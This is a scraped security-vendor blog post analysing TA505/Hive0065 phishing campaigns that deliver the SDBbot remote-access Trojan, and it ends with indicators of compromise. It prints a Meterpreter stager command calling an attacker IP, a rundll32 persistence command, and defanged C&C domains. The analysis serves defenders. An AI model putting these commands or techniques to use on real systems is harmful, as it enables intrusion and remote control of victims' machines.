class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 7</span> <span class="rt-label rt-postfix">min read</span></span></span> </div> </div> <hr class="separator"> <div class="title"> <a href="https://securityintelligence.com/category/x-force/threats/"><span class="name_category">Advanced Threats<br> <a href="https://securityintelligence.com/category/topics/incident-response/"><span class="name_other_category">Incident Response<br> </span></a> </div> <div class="social-container" style="visibility: hidden;"> <hr class="separator"> <div class="social">  <a href="https://twitter.com/intent/tweet?text=TA505 Continues to Infect Networks With SDBbot RAT&url=https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/twitter.svg" alt="twitter"></amp-img></a> <a href="https://www.linkedin.com/shareArticle?url=https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/linkedin.svg" alt="Linkedin" ></amp-img></a> <a href="https://www.facebook.com/sharer/sharer.php?u=https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/facebook.svg" alt="facebook"></amp-img></a> <a href="https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/link.svg" alt="An arrow pointing up"></amp-img></a> </div> </div> </div> <script> window.addEventListener('scroll', function() { var category = document.querySelector('.category'); var scrollPosition = window.scrollY; if (scrollPosition >= 0) { category.classList.add('sticky'); } else { category.classList.remove('sticky'); } }); // Function to set the light theme function setLightTheme(event, toSaveLocalStorage = true) { event.preventDefault(); const body = document.body; body.classList.remove('dark-theme'); // Save the user's theme preference in localStorage if (toSaveLocalStorage && !location.href.includes("/x-force/")) { setSiTheme('light'); } } // Function to set the dark theme function setDarkTheme(event, toSaveLocalStorage = true) { event.preventDefault(); const body = document.body; body.classList.add('dark-theme'); // Save the user's theme preference in localStorage if (toSaveLocalStorage && !location.href.includes("/x-force/")) { setSiTheme('dark'); } } // Add click event listeners to the theme links document.getElementById('light-theme-link').addEventListener('click', (event) => setLightTheme(event)); document.getElementById('dark-theme-link').addEventListener('click', (event) => setDarkTheme(event)); // Check localStorage to set the initial theme preference const themePreference = localStorage.getItem('si-theme-mode'); // Function to simulate a click event function simulateClick(handler, toSaveLocalStorage) { const event = new Event('click'); handler(event, toSaveLocalStorage); } // Apply the correct theme based on URL and preference if (location.href.includes("/x-force/")) { simulateClick(setDarkTheme, false); // Apply the dark theme for all x-force posts } else if (themePreference === 'dark') { simulateClick(setDarkTheme, true); // Apply the dark theme based on user preference } else if (themePreference === 'light') { simulateClick(setLightTheme, true); // Apply the light theme based on user preference (default) } else { simulateClick(setLightTheme, true); // Apply the light theme by default } </script> <script> const cookies = JSON.parse(localStorage.getItem("truste.eu.cookie.notice_preferences")); if (cookies && cookies.value === '2:') { document.querySelector('.social-container').style.visibility = 'visible'; } </script> </div> <main class="post__content post__content--continue_reading" id="post__content"> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html><body><p><a href="https://www.ibm.com/security/services/ibm-x-force-incident-response-and-intelligence" target="_blank" rel="noopener nofollow" >IBM X-Force Incident Response and Intelligence Services (IRIS)</a> responds to security incidents around the globe. During analysis and comparison of malicious activity on enterprise networks, our team identified attacks likely linked to Hive0065, also known as TA505. We observed that Hive0065 continues to spread the SDBbot remote-access Trojan (RAT) alongside other custom malware and continues to display tactics used against companies within the past year.</p> <p>Attacks that deploy malware and RATs on targeted networks are a way for cybercrime groups to compromise networks and open channels for further activity, which could be immediate, or take place at a later stage. RATs are a common tool in targeted attacks as they enable a vast array of remote actions for the attacker. Those include deploying additional malware, spying on users and carrying out actions from the infected device or server where they are installed.</p> <p>Hive0065 is a financially motivated cybercrime group that has been actively targeting various industries, including finance, retail and restaurants, since at least 2014. This group primarily conducts malicious spam campaigns delivering a wide range of custom and open-source malware. The most notorious among these are campaigns involving banking Trojans such as Dridex and <a href="https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" target="_blank" rel="noopener nofollow" >TrickBot</a>, ransomware such as Clop/<a href="https://securityintelligence.com/news/new-dll-cryptomix-ransomware-reportedly-using-remote-desktop-services-for-installation/" target="_blank" rel="noopener nofollow" >Cryptomix</a> and MINEBRIDGE, and extortion schemes demanding payment in bitcoin.</p> <h2>SDBbot and Familiar TTPs</h2> <p>In November 2019, X-Force IRIS observed a threat actor targeting enterprise employees in Europe with a spear phishing email impersonating Onehub<a title="" href="#_ftn1" target="_blank" rel="noopener nofollow" ></a>, a legitimate, cloud-based file-sharing application for businesses. The email was designed to extract Active Directory (AD) discovery data and user credentials and to infect the environment with the SDBbot RAT. Based on our investigation and analysis of the actor’s tactics, techniques and procedures (TTPs), their command-and-control (C&C) infrastructure and the use of specific malware previously attributed to the group, X-Force IRIS suspects it is highly likely that Hive0065 was behind the attacks.</p> <p>SDBbot RAT has been <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" target="_blank" rel="noopener nofollow" target="_blank" rel="noopener nofollow" >observed in Hive0065 attacks</a> since at least September 2019 and has been used primarily as a secondary payload. This malware features remote-access capabilities, accepts commands from a C&C server such as video recording, and has the ability to exfiltrate data from the victimized devices and networks.</p> <p>In a variety of campaigns attributed to this group previously reported by <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack" target="_blank" rel="noopener nofollow" target="_blank" rel="noopener nofollow" >Proofpoint</a> and <a href="https://www.zerofox.com/blog/ta505-halloween-malware/" target="_blank" rel="noopener nofollow" target="_blank" rel="noopener nofollow" >ZeroFOX</a>, Hive0065 was observed to be conducting phishing campaigns that delivered malicious Excel (.XLS) files hosted on domains spoofed to appear as the cloud storage sites Sync and Dropbox. The campaigns also featured C&C infrastructure that spoofs other legitimate services, like Google Drive and Microsoft Office.</p> <p>More recent Hive0065 <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack" target="_blank" rel="noopener nofollow" target="_blank" rel="noopener nofollow" >campaigns</a> reported in March 2020 exploited the current interest in the COVID-19 pandemic, using Coronavirus-themed phishing emails to deliver the Locky ransomware and the Dridex banking Trojan. In some campaigns, Hive0065 targeted healthcare organizations with emails purporting to come from medical research groups and offering supposed Coronavirus remedies in exchange for bitcoin payments. The TTPs used in these campaigns align with those of Hive0065/TA505, specifically the spoofing of cloud storage websites to distribute malware files.</p> <h2 class="">Continued Malicious Activity</h2> <p>Research conducted during X-Force IRIS investigations found continued malicious activity from Hive0065 that infected company networks with malware and the SDBbot RAT. The TTPs that we found are consistent with previous activity attributed to Hive0065:</p> <ul> <li class="">Spear phishing to deliver malware</li> <li class="">Macro-enabled documents</li> <li class="">The use of droppers containing embedded dynamic-link libraries (DLLs)</li> <li class="">The use of an installer component</li> <li class="">The use of legitimate cloud hosting services for malware distribution</li> <li class="">Spoofing legitimate services like Microsoft and Google</li> <li>C&C domains similar in naming convention and structure (sample of domain names shown below)</li> </ul> <table style="width: 100%;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="font-size: 12px;" valign="top"><strong>Domains reported<br> by X-Force</strong></td> <td style="font-size: 12px;" valign="top"><strong>Domains reported<br> by Proofpoint</strong></td> <td style="font-size: 12px;" valign="top"><strong>Domains reported<br> by ZeroFOX</strong></td> </tr> <tr> <td style="font-size: 12px;" valign="top">drm-server-booking[.]com</td> <td style="font-size: 12px;" valign="top">news-server-drm-google[.com</td> <td style="font-size: 12px;" valign="top">office-en-service[.]com</td> </tr> <tr> <td style="font-size: 12px;" valign="top">microsoft-live-us[.]com</td> <td style="font-size: 12px;" valign="top">update365-office-ens[.]com</td> <td style="font-size: 12px;" valign="top">googledrive-download[.]com</td> </tr> <tr> <td style="font-size: 12px;" valign="top">dl1.sync-share[.]com</td> <td style="font-size: 12px;" valign="top">office365-update-en[.]com</td> <td style="font-size: 12px;" valign="top">d1.syncdownloading[.]com</td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <h2 class="">Compromise Summary</h2> <p>In order to gain access to victim environments, Hive0065 sends a malicious email to employees purporting to be from an HR representative’s account. The email body impersonated Onehub, inviting the recipient to download a malicious document named <em>Resume.doc</em>.</p> <p><amp-img src="https://securityintelligence.com/wp-content/uploads/2020/04/onehub.png" layout="intrinsic" class="" alt="Email Body Including Onehub" width="411" height="361" lightbox="lightbox"></amp-img></p> <p>The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network.</p> <h2 class="">Hive0065’s Arsenal of Tools</h2> <h4 class="">VSPUB DLLs With CobaltStrike Code Similarities</h4> <p>The malicious email delivering the file named <em>Resume.doc</em> initially led the recipient to a malicious domain. After several redirections, the final redirect pointed to the malicious URL <em>hxxps://dl1.sync-share[.]com?Or2at</em>. In addition, we also observed employees who opened the document browsed to <em>hxxps://dl1.sync-share[.]com</em> and downloaded <em>Resume (1).doc</em> and a second file, <em>Resume (3).doc</em>.</p> <p>Seconds later, a suspicious document named <em>main_template.docx</em> was created.</p> <p>Every time <em>main_template.docx</em> was opened, VBA macros were executed and a fake Microsoft Office login window (<em>FakeL.exe</em>) was displayed to the user while a malicious payload executed in the background. If the password entered was correct, the display disappeared. Password attempts were written into a file named <em>Password.txt</em>, which was subsequently deleted.</p> <hr align="left" size="1" width="33%"> <p><amp-img src="https://securityintelligence.com/wp-content/uploads/2020/04/fake-windows-login.png" layout="intrinsic" class="" alt="Fake Login Display" width="450" height="103" lightbox="lightbox"></amp-img></p> <p>The document may also display the fake message “This document is protected” to entice users to enable content and execute malicious code. The .docx file contained embedded x86 and x64 versions of the payload DLL so that the appropriate version was dropped depending on the target operating system.</p> <p>The DLLs were dropped to the following locations:</p> <ul> <li class="left" style="text-align: left;">x86: %APPDATA%\Microsoft\Windows\Template\vspub1.dll</li> <li class="left" style="text-align: left;">x64: %APPDATA%\Microsoft\Windows\Template\vspub2.dll</li> </ul> <p>The DLLs were loaded to the memory space of <em>winword.exe</em> using LoadLibraryW API, and the DLL module was compressed twice to hide actual code. It used a custom packer that unpacks to UPX, an open-source executable packer, which revealed the actual code.</p> <p><amp-img src="https://securityintelligence.com/wp-content/uploads/2020/04/si-img-customPacker.jpg" layout="intrinsic" class="alignnone size-full wp-image-418038" alt="Image of a compressed module" width="800" height="73" lightbox="lightbox"></amp-img></p> <p>While these DLLs did not match existing, known code families, a code comparison showed that this code has similarities with the <a href="https://attack.mitre.org/software/S0154/" target="_blank" rel="noopener nofollow" target="_blank" rel="noopener nofollow" >CobaltStrike</a> framework. The VSPUB DLLs gather system information and use HTTP POST requests to send it to the C&C domain <em>microsoft-live-us[.]com/fidonet</em> or the IP address 185[.]176[.]221[.]45. Code suggests that upon successful reply from the server, the DLL can download and execute additional files.</p> <p>To note, <em>microsoft-live-us[.]com</em> was registered just days before the attack took place, along with the domain <em>sync-share[.]com</em>, to include subdomains <em>dl1.sync-share[.]com</em>,<em> dl2.sync-share[.]com </em>and <em>dl3.sync-share[.]com</em>. <em>Sync-share[.]com</em> is likely attacker-owned infrastructure, and although the dl2 and dl3 subdomains were not observed in this particular activity, it is likely that these domains will be used in a similar fashion.</p> <h4 class="">Meterpreter Reverse Shell</h4> <p>After the initial system was compromised, the actors proceeded to compromise additional systems on the network by executing malicious PowerShell services running as the local SYSTEM, as well as the installation of bind shells. A Meterpreter reverser shell was used in order to remotely control compromised systems within the internal network; it was installed as a service using the execution of an encoded PowerShell script. The malicious PowerShell command decodes into a reverse shell connecting back to two malicious IP addresses:</p> <ul> <li class="">91[.]214[.]124[.]20</li> <li class="">91[.]214[.]124[.]25</li> </ul> <p>While most samples we found during our investigations were Meterpreter reverse shells connecting back to a C&C IP address, Meterpreter bind-shells that listen for incoming connections were also discovered. We found that a domain admin account was compromised and the Active Directory audit tool PingCastle was run. Using the domain admin, the actor was able to compromise several other accounts and execute malicious services and persistence mechanisms, namely SDBbot RAT Loaders.</p> <h4 class="">TinyMet Meterpreter Stager</h4> <p>The investigation led our team to the discovery of a file named <em>wsus.exe</em> (a version of TinyMet, a tiny, flexible Meterpreter stager), along with three additional files that were created and executed on the first compromised system.</p> <p>During the investigation, TinyMet was observed being executed with the command <em>c:\intel\wsus.exe 1 91.214.124[.]20 43434</em>, indicating a reverse HTTP connection, and connected to a malicious IP address by either renaming a binary or providing specific arguments. The commands executed were used for discovery purposes, listing members of privileged groups and network information.</p> <h2 class="">SDBbot RAT</h2> <h4 class="">SDBbot RAT Installer</h4> <p>X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot’s code and strings upon execution. In addition, they read a binary blob located within the registry <em>HKLM\\MACHINE\\SOFTWARE\\Microsoft\\[3 characters]\[1 character]</em>. Depending on user privileges, a binary blog is located in the registry value. If regular user privileges are running, the installer component will establish persistence using the registry <em>Run</em> and execute ordinal #1 of the DLL:</p> <p class="" align="center"><em>rundll32 “C:\Users\[USER]\AppData\Roaming\xrjkrobuy.dll”,#1</em></p> <h4 class="">SDBbot RAT Loader</h4> <p>As part of the investigation, X-Force IRIS found that the SDBbot RAT loader we analyzed was similar in nature to the version analyzed by <a href="https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" target="_blank" rel="noopener nofollow" target="_blank" rel="noopener nofollow" >Proofpoint</a>, which was defined as the “Loader Component” of SDBbot in Hive0065 campaigns from October 2019. The loader component will read the binary blob and execute the contained shellcode. Once the shellcode executes, it decompresses and executes the SDBbot payload. The shellcode will check to see if it was executed earlier than the loader DLL files and if found to be “TRUE,” the process is terminated.</p> <h4 class="">SDBbot RAT Payload</h4> <p>Once the attackers established a foothold on the network, four new registry keys on the local Software hive were created and SDBbot RAT loader DLL files were installed as persistence mechanisms; the loaders were injected into the process <em>winlogon.exe</em> every time the process was executed.</p> <p>Upon execution, SDBbot RAT checks for the presence of the mutex<em> windows_7_windows_10_check_running_once_mutex</em> and proceeds to retrieve a C&C address from the file <em>C:\ip.txt</em>. If that file is not available, it will use the C&C <em>drm-server-booking[.]com</em> as the default server. SDBbot RAT will subsequently gather system information and communicate back to the C&C server by sending and receiving a DWORD: 0xC0DE0000. The C&C will send additional arguments depending on the command.</p> <h2>Conclusion</h2> <p>Hive0065 has been active since at least 2014, adjusting its TTPs, targeting and infrastructure with each campaign. A relatively recent addition to Hive0065’s toolkit, SDBbot, is being used in attacks primarily as a second-stage malware, composed of an installer, a loader and RAT components.</p> <p>SDBbot has the ability to perform typical RAT functions, such as communicating with C&Cs, receiving commands and obtaining system information. On infected systems, this malware could grant attackers extensive ability to drop and execute additional malicious payloads, control infected systems and perform actions the legitimate user would have access to. Remote-access Trojans are one of the most prevalent tools in targeted attacks as they facilitate that type of control for remote attackers.</p> <p>As X-Force IRIS continues to track Hive0065, we expect to see this group continue to target a wide range of industries using social engineering to deliver open-source and custom malware while constantly adjusting TTPs and C&C infrastructure to evade detection.</p> <h2>Indicators of Compromise (IoCs)</h2> <p class=""><strong>C&C IP Addresses</strong></p> <ul> <li class="">91[.]214[.]124[.]25</li> <li class="">91[.]214[.]124[.]20</li> <li class="">185[.]176[.]221[.]45</li> </ul> <p class=""><strong>C&C Domains</strong></p> <ul> <li class="">drm-server-booking[.]com</li> <li class="">microsoft-live-us[.]com</li> <li class="">dl1.sync-share[.]com</li> </ul> <p class=""><strong>URL Redirections</strong></p> <ul> <li class="">https://eur01.safelinks.protection.outlook[.]com/?url=https://clck.ru/JnFFT&data=02|01||bed42450519b40df4d8808d762bd4ff1|d847080b33824b27886012fe4d8edb27|1|0|637086437565223782&sdata=0VDHXIfGUjxrbDC0fnF/VcgoQIGSAD/PBCYcwFodSH4=&reserved=0</li> <li class="">https://clck[.]ru/JnFFT</li> <li class="">https://sba.yandex[.]net/redirect?url=https%3A%2F%2Fdl1.sync-</li> <li>share.com%3FOr2at&client=clck&sign=2a3f3d25a38344769c6cfb6705a0f918′</li> </ul> <p class=""><strong>Final Redirection Hosting Malicious Document</strong></p> <ul> <li class="">https://dl1.sync-share[.]com?Or2at</li> </ul> <p class=""><strong>Files</strong></p> <table style="width: 100%; font-size: 12px;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td valign="top"><strong>File name</strong></td> <td valign="top"><strong>SHA1</strong></td> <td valign="top"><strong>Description</strong></td> </tr> <tr> <td valign="top">main_template.docx</td> <td valign="top">33094acd614825a916b77df6c5141c088fc3768b</td> <td valign="top">Malicious document</td> </tr> <tr> <td valign="top">vspub1.dll</td> <td valign="top">bf0f7abda2228059bb00ec9658ee447fbe84d277</td> <td valign="top">CobaltStrike similarities</td> </tr> <tr> <td valign="top">vspub2.dll</td> <td valign="top">d40510da42a478d72e649993208710668a7f6c27</td> <td valign="top">CobaltStrike similarities</td> </tr> <tr> <td valign="top">xrjkrobuy.dll</td> <td valign="top">14f52ae68344e1643b3066c10f7044fdd819db4e</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">upywloeza.dll</td> <td valign="top">0cc7cca16afd632857e3883c06b2f55c057b563e</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">dtzvlbtxn.dll</td> <td valign="top">d36e983886a084887f887c6d562d3bc0664587c4</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">lvgoywrnxwy.dll</td> <td valign="top">fea7d944e317c7b2ef1aba57600a8c5310368085</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">qcuqqgxmy.dll</td> <td valign="top">35423e04e58ab1f2267e19c47e1c69ea5b7041cc</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">pdxqzmftr.dll</td> <td valign="top">fd9620c0c295caaee3096423532bb1dbfb7064c5</td> <td valign="top">SDBot RAT</td> </tr> <tr> <td valign="top">lowpro3.13.exe</td> <td valign="top">cb0b39534d99057b02b090c3650fb1de43d19a02</td> <td valign="top">Binary</td> </tr> <tr> <td valign="top">wsus.exe</td> <td valign="top">caff1d315a5d87014e5fa62346f58407755d971e</td> <td valign="top">Meterpreter stager</td> </tr> <tr> <td valign="top">FakeL.exe</td> <td valign="top">45c43ec18d15ba7850e6ad2e2e54671636f4d926</td> <td valign="top">Password Stealer</td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> </body></html> <div id="nc_pixel"></div><div class="post__tags"> <a href="https://securityintelligence.com/tag/command-and-control-cc/" rel="tag">Command-and-Control (C&C)</a><span> | </span><a href="https://securityintelligence.com/tag/cyber-crime/" rel="tag">Cybercrime</a><span> | </span><a href="https://securityintelligence.com/tag/macros/" rel="tag">Macros</a><span> | </span><a href="https://securityintelligence.com/tag/malware/" rel="tag">Malware</a><span> | </span><a href="https://securityintelligence.com/tag/malware-analysis/" rel="tag">Malware Analysis</a><span> | </span><a href="https://securityintelligence.com/tag/open-source/" rel="tag">Open Source</a><span> | </span><a href="https://securityintelligence.com/tag/remote-access-trojan/" rel="tag">Remote-Access Trojan (RAT)</a><span> | </span><a href="https://securityintelligence.com/tag/targeted-attacks/" rel="tag">Targeted Attacks</a><span> | </span><a href="https://securityintelligence.com/tag/threat-intelligence-2/" rel="tag">Threat Intelligence</a><span> | </span><a href="https://securityintelligence.com/tag/trojan/" rel="tag">Trojan</a><span> | </span><a href="https://securityintelligence.com/tag/x-force/" rel="tag">X-Force</a></div> <div class="post__author author "> <div class="author__box"> <div class="author__photo" style="background-image: url(https://securityintelligence.com/wp-content/uploads/2020/04/profile-pic-2.jpg);"></div> <div class="author__infos"> <div class="author__name"><a href="https://securityintelligence.com/author/melissa-frydrych/" >Melissa Frydrych</a></div> <div class="author__role">Threat Hunt Researcher, IBM</div> </div> </div> </div>  <style type="text/css"> .post__content--continue_reading{ max-height: 725px; overflow:hidden; transition: max-height cubic-bezier(0.9, 0, 1, 1) 2s; } @media (max-width: 768px) { .post__content--continue_reading{ max-height: 1225px; } } </style> <div class="continue_reading_wrapper" id="continue_reading"> <button on="tap: post__content.toggleClass(class=post__content--continue_reading), continue_reading.toggleClass(class=continue_reading_wrapper--clicked)" tabindex="0" role="button">Continue Reading</button> </div> </main> </div> </div> <aside class="grid__sidebar post__sidebar "> <div class="mobile_divider"></div> <header class="post__sidebar__header">POPULAR</header>  <article class="article article_grid article__mobile--card">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/articles/how-red-teaming-helps-safeguard-the-infrastructure-behind-ai-models/" aria-label="How red teaming helps safeguard the infrastructure behind AI models"> <div class="article__img"> <amp-img alt="A woman in a red shirt sitting at a desk in an office with her back to us working on a laptop" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/In-a-contemporary-office-setting-a-young-businesswoman-is-focused-on-her-laptop-displaying-dedication-and-efficiency-in-her-work-630x330.jpeg.webp"> <amp-img fallback alt="A woman in a red shirt sitting at a desk in an office with her back to us working on a laptop" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2025/02/In-a-contemporary-office-setting-a-young-businesswoman-is-focused-on-her-laptop-displaying-dedication-and-efficiency-in-her-work-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <a class="article__category_link" href="https://securityintelligence.com/category/topics/artificial-intelligence/" aria-label="https://securityintelligence.com/category/topics/artificial-intelligence/"> Artificial Intelligence </a>  <span class="article__date"> February 13, 2025 </span>  <a href="https://securityintelligence.com/articles/how-red-teaming-helps-safeguard-the-infrastructure-behind-ai-models/" class="article__content_link" aria-label="How red teaming helps safeguard the infrastructure behind AI models"> <h2 class="article__title">How red teaming helps safeguard the infrastructure behind AI models</h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 4</span> <span class="rt-label rt-postfix">min read</span></span> - </span>Artificial intelligence (AI) is now squarely on the frontlines of information security. However, as is often the case when the pace of technological innovation is very rapid, security often ends up being a secondary consideration. This is increasingly evident from… </p> </a> </div> </article> <article class="article article_grid article__mobile--card">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/articles/hacking-the-mind-why-psychology-matters-to-cybersecurity/" aria-label="Hacking the mind: Why psychology matters to cybersecurity"> <div class="article__img"> <amp-img alt="Hands typing on a laptop next to a window of bright sunny day & a yellow outline of a digital brain image in the foreground" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/Double-exposure-of-creative-human-brain-microcircuit-with-hand-typing-on-computer-keyboard-on-background.-Future-technology-and-AI-concept-630x330.jpeg.webp"> <amp-img fallback alt="Hands typing on a laptop next to a window of bright sunny day & a yellow outline of a digital brain image in the foreground" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2025/02/Double-exposure-of-creative-human-brain-microcircuit-with-hand-typing-on-computer-keyboard-on-background.-Future-technology-and-AI-concept-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <a class="article__category_link" href="https://securityintelligence.com/category/topics/security-intelligence-analytics/" aria-label="https://securityintelligence.com/category/topics/security-intelligence-analytics/"> Intelligence & Analytics </a>  <span class="article__date"> February 6, 2025 </span>  <a href="https://securityintelligence.com/articles/hacking-the-mind-why-psychology-matters-to-cybersecurity/" class="article__content_link" aria-label="Hacking the mind: Why psychology matters to cybersecurity"> <h2 class="article__title">Hacking the mind: Why psychology matters to cybersecurity</h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 4</span> <span class="rt-label rt-postfix">min read</span></span> - </span>In cybersecurity, too often, the emphasis is placed on advanced technology meant to shield digital infrastructure from external threats. Yet, an equally crucial — and underestimated — factor lies at the heart of all digital interactions: the human mind. Behind… </p> </a> </div> </article> <article class="article article_grid article__mobile--card">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/articles/will-ai-threaten-the-role-of-human-creativity-in-cyber-threat-detection/" aria-label="Will AI threaten the role of human creativity in cyber threat detection?"> <div class="article__img"> <amp-img alt="A robot hand in bottom left corner finger pointing up to a lit lightbulb & a human hand upper right corner pointing down to same" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/Creative-and-innovation-inspiration.-Business-Bright-idea-and-Artificial-Intelligence-solution-concept-630x330.jpeg.webp"> <amp-img fallback alt="A robot hand in bottom left corner finger pointing up to a lit lightbulb & a human hand upper right corner pointing down to same" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2025/02/Creative-and-innovation-inspiration.-Business-Bright-idea-and-Artificial-Intelligence-solution-concept-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <a class="article__category_link" href="https://securityintelligence.com/category/topics/artificial-intelligence/" aria-label="https://securityintelligence.com/category/topics/artificial-intelligence/"> Artificial Intelligence </a>  <span class="article__date"> February 7, 2025 </span>  <a href="https://securityintelligence.com/articles/will-ai-threaten-the-role-of-human-creativity-in-cyber-threat-detection/" class="article__content_link" aria-label="Will AI threaten the role of human creativity in cyber threat detection?"> <h2 class="article__title">Will AI threaten the role of human creativity in cyber threat detection?</h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 4</span> <span class="rt-label rt-postfix">min read</span></span> - </span>Cybersecurity requires creativity and thinking outside the box. It’s why more organizations are looking at people with soft skills and coming from outside the tech industry to address the cyber skills gap. As the threat landscape becomes more complex and… </p> </a> </div> </article>  <div class="billboard_wrapper"> <a href="https://www.ibm.com/reports/data-breach?utm_medium=OSocial&utm_source=Blog&utm_content=RSRWW&utm_id=si-blog-right-rail " aria-label="A SPONSORED flag "> <amp-img layout='responsive' widht='300' height='250' src="https://securityintelligence.com/wp-content/uploads/2024/07/SIB_CODB_rightrail_banners2024-think_600x1200.png" alt="CODB right rail banner with red, blue, & purple lines in a wide circular pattern"> </amp-img> </a> </div> </aside> </div> <script> const kaltura = document.querySelectorAll("[data-widget=\"videoplayer\"]") if (kaltura != null) { kaltura.forEach(function(item){ const kId = item.id + '--' + item.dataset.videoid; document.getElementById(item.id).id = kId; getKalturaVideo(item); }) } </script> <div class="card_container_background "> <section class="container cards"> <h3>More from Advanced Threats</h3> <div class="cards__wrapper"> <article class="article article--card cards__article_grid ">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/x-force/phishing-kit-trends-top-10-spoofed-brands-2023/"> <div class="article__img"> <amp-img alt="Closeup on a laptop displaying a warning for possible spam email" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/05/Blocking-spam-e-mail-warning-pop-up-for-phishing-mail-network-security-concept.-Business-man-working-on-laptop-computer-at-home-with-warning-window-on-screen-630x330.jpeg.webp"> <amp-img fallback alt="Closeup on a laptop displaying a warning for possible spam email" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/05/Blocking-spam-e-mail-warning-pop-up-for-phishing-mail-network-security-concept.-Business-man-working-on-laptop-computer-at-home-with-warning-window-on-screen-630x330.jpeg"> </amp-img> </amp-img> </div> </a>  <div class="article__text_container" style="-webkit-box-orient: vertical;">  <div class="article__eyebrow"> <span class="article__date"> May 24, 2024 </span> </div>  <a href="https://securityintelligence.com/x-force/phishing-kit-trends-top-10-spoofed-brands-2023/" class="article__content_link"> <div class="article__direction"> <h2 class="article__title"> Phishing kit trends and the top 10 spoofed brands of 2023 </h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 4</span> <span class="rt-label rt-postfix">min read</span></span> - </span>聽The 2024 IBM X-Force Threat Intelligence Index reported that phishing was one of the top initial access vectors observed last year, accounting for 30% of incidents. To carry out their phishing campaigns, attackers often use phishing kits: a collection of tools, resources and scripts that are designed and assembled to ease deployment. Each phishing kit deployment corresponds to a single phishing attack, and a kit could be redeployed many times during a phishing campaign. IBM X-Force has analyzed thousands of… </p> </div> </a> </div> </article> <article class="article article--card cards__article_grid ">  <a class="exclusive_article__category_link" href="https://securityintelligence.com/x-force/grandoreiro-banking-trojan-unleashed/"> <div class="article__img"> <amp-img alt="Warning message,Computer notification on screen" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/05/Hacking-attack-in-Progress-Computer-Alert-Message-System-Breach-3-630x330.jpeg.webp"> <amp-img fallback alt="Warning message,Computer notification on screen" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/05/Hacking-attack-in-Progress-Computer-Alert-Message-System-Breach-3-630x330.jpeg"> 